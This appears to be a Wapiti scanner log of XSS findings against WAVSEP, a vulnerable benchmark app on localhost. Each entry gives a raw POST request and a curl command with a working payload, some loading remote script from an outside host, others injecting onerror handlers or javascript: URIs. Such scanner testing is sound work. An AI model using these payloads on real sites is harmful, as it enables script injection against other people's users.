curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbe6exxrntz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwhf9uxxftz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwhf9uxxftz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw477faeieqz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw477faeieqz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w6yx4l9jfg%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w6yx4l9jfg%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wf5j5o1mmy%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wf5j5o1mmy%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w4p2dcx8g8%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w4p2dcx8g8%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjqbsshbbxz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjqbsshbbxz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb9jvo7b1dz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb9jvo7b1dz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw45mggfhwcz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw45mggfhwcz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27wsdnpt8q3l%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27wsdnpt8q3l%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w60llee98b%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w60llee98b%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%3Ealert%28%27w7jbxcqjf8%27%29%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%3Ealert%28%27w7jbxcqjf8%27%29%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4lfavwl4cz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case01-RFI-FalsePositive-Forward-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4lfavwl4cz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter target
POST /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwijs21781tz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwijs21781tz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp Content-Type: application/x-www-form-urlencoded userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wik0hg583x%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp" -d "userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wik0hg583x%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwa16rtyoopz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwa16rtyoopz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtak0jo64zz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case02-Tag2TagScope.jsp" -d "userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwtak0jo64zz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp Content-Type: application/x-www-form-urlencoded userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgdf3xvqgzz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case03-Tag2TagStructure.jsp" -d "userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgdf3xvqgzz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwzre2h5cj1%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case05-Tag2Frameset.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwzre2h5cj1%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wyr5r3vucv%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case06-Event2TagScope.jsp" -d "userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wyr5r3vucv%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w2ilojiq2x%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case07-Event2DoubleQuotePropertyScope.jsp" -d "userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w2ilojiq2x%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp Content-Type: application/x-www-form-urlencoded userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wx01jnjo54%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case08-Event2SingleQuotePropertyScope.jsp" -d "userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wx01jnjo54%22%29%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp Content-Type: application/x-www-form-urlencoded userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwa40x723bz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case09-SrcProperty2TagStructure.jsp" -d "userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwa40x723bz.js%3E%3C%2Fscript%3E"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwl7uh28xru%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwl7uh28xru%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwd4anvbqc3%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwd4anvbqc3%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwua9d3wbtz%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case19-Js2PropertyJsScope.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwua9d3wbtz%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwxkjabhzwy%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwxkjabhzwy%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp Content-Type: application/x-www-form-urlencoded userinput=javascript%3AString.fromCharCode%280%2Cwb2tywjp4a%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case21-Vbs2PropertyVbsScope.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwb2tywjp4a%2C1%29%3B"
XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp Content-Type: application/x-www-form-urlencoded userinput=String.fromCharCode%280%2Cw4z5fby6kf%2C1%29
